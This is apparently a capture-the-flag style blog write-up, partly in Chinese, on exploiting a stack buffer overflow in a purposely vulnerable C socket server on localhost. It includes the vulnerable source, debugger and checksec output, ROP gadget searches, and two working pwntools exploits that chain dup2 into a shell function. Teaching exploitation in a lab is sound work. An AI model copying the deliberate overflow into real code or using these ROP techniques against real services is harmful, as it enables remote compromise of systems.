socket exploitation
socket vuln
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
void vuln(int childfd) {
char buffer[30];
read(childfd, buffer, 500);
write(childfd, "Thanks!", 8);
}
void win() {
system("/bin/sh");
}
////////////////////// Socket Stuff
/*
* error - wrapper for perror
*/
void error(char *msg) {
perror(msg);
exit(1);
}
int main(int argc, char **argv) {
int parentfd; /* parent socket */
int childfd; /* child socket */
int portno; /* port to listen on */
int clientlen; /* byte size of client's address */
struct sockaddr_in serveraddr; /* server's addr */
struct sockaddr_in clientaddr; /* client addr */
struct hostent *hostp; /* client host info */
char *hostaddrp; /* dotted decimal host addr string */
int optval; /* flag value for setsockopt */
int n; /* message byte size */
/*
* check command line arguments
*/
if (argc != 2) {
fprintf(stderr, "usage: %s <port>\n", argv[0]);
exit(1);
}
portno = atoi(argv[1]);
/*
* socket: create the parent socket
*/
parentfd = socket(AF_INET, SOCK_STREAM, 0);
if (parentfd < 0)
error("ERROR opening socket");
/* setsockopt: Handy debugging trick that lets
* us rerun the server immediately after we kill it;
* otherwise we have to wait about 20 secs.
* Eliminates "ERROR on binding: Address already in use" error.
*/
optval = 1;
setsockopt(parentfd, SOL_SOCKET, SO_REUSEADDR,
(const void *)&optval , sizeof(int));
/*
* build the server's Internet address
*/
bzero((char *) &serveraddr, sizeof(serveraddr));
/* this is an Internet address */
serveraddr.sin_family = AF_INET;
/* let the system figure out our IP address */
serveraddr.sin_addr.s_addr = htonl(INADDR_ANY);
/* this is the port we will listen on */
serveraddr.sin_port = htons((unsigned short)portno);
/*
* bind: associate the parent socket with a port
*/
if (bind(parentfd, (struct sockaddr *) &serveraddr, sizeof(serveraddr)) < 0)
error("ERROR on binding");
/*
* listen: make this socket ready to accept connection requests
*/
if (listen(parentfd, 5) < 0) /* allow 5 requests to queue up */
error("ERROR on listen");
/*
* main loop: wait for a connection request, echo input line,
* then close connection.
*/
clientlen = sizeof(clientaddr);
/*
* accept: wait for a connection request
*/
childfd = accept(parentfd, (struct sockaddr *) &clientaddr, &clientlen);
if (childfd < 0)
error("ERROR on accept");
/*
* gethostbyaddr: determine who sent the message
*/
hostp = gethostbyaddr((const char *)&clientaddr.sin_addr.s_addr, sizeof(clientaddr.sin_addr.s_addr), AF_INET);
if (hostp == NULL)
error("ERROR on gethostbyaddr");
hostaddrp = inet_ntoa(clientaddr.sin_addr);
if (hostaddrp == NULL)
error("ERROR on inet_ntoa\n");
printf("server established connection with %s (%s)\n",
hostp->h_name, hostaddrp);
vuln(childfd);
dup2(0, 0); // here for the presence of dup2
close(childfd);
}
- client send request
└─$ nc localhost 9001
hello,i want to exploit u
Thanks!
- server listen port 9001,return response
└─$ ./vuln 9001
server established connection with localhost (127.0.0.1)
漏洞利用
- 求溢出偏移
- de ruijin sequence
──(kali㉿kali)-[~]
└─$ ragg2 -P 100 -r
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
- send server waiting for crash
[0x0040127b]> dr
...
rip = 0x0040127b
rflags = 0x00010203
orax = 0xffffffffffffffff
[0x0040127b]> wopO `dr rbp`
32
because the rbp’s offset is 32, so the rip’s offset is 40 2. try overflow buffer with ‘A’ * 40 + ‘B’ * 8
from pwn import *
p = remote('127.0.0.1',9001)
payload = flat('A' * 40, 'B' * 8)
p.sendline(payload)
log.info(p.clean())
[0x0040127b]> pxw @ rsp - 40
0x7fffffffe260 0x41414141 0x41414141 0x41414141 0x41414141 AAAAAAAAAAAAAAAA
0x7fffffffe270 0x41414141 0x41414141 0x41414141 0x41414141 AAAAAAAAAAAAAAAA
0x7fffffffe280 0x41414141 0x41414141 0x42424242 0x42424242 AAAAAAAABBBBBBBB
- 规划栈布局
栈偏移 栈内容 + 40 pop_rdi + 48 4 + 56 pop_rsi + 64 0 + 72 dup2() + 80 pop_rdi + 88 4 + 96 pop_rsi + 104 1 + 112 dup2 + 120 win
- find gadget for bypassing nx protection
└─$ checksec --file=./vuln
[*] '/home/kali/exploits/sockets/vuln'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
┌──(kali㉿kali)-[~/exploits/sockets]
└─$ ROPgadget --binary ./vuln|grep 'pop rsi'
0x0000000000401509 : pop rsi ; pop r15 ; ret
┌──(kali㉿kali)-[~/exploits/sockets]
└─$ ROPgadget --binary ./vuln|grep 'pop rdi'
0x000000000040150b : pop rdi ; ret
- write pwn code
form pwn import *
elf = context.binary = ELF('./vuln')
p = remote('localhost',9001)
pop_rdi = 0x40150b
pop_rsi = 0x401509
payload = flat(
'a' * 40,
pop_rdi,
4,
pop_rsi,
0,
0,
elf.plt['dup2'],
pop_rdi,
4,
pop_rsi,
1,
0,
elf.plt['dup2'],
elf.sym['win']
)
p.sendline(payload)
p.recvuntil('Thanks!\x00')
p.interactive()
- write pwn code by tools
from pwn import *
elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)
rop = ROP(elf)
rop.raw('A' * 40)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.win()
p.sendline(rop.chain())
p.recvuntil('Thanks!\x00')
p.interactive()
- 原文作者:winsun
- 原文链接:https://winsun.github.io/fightsec/post/pwn_19_exp_socket/
- 版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议进行许可,非商业转载请注明出处(作者,原文链接),商业转载请联系作者获得授权。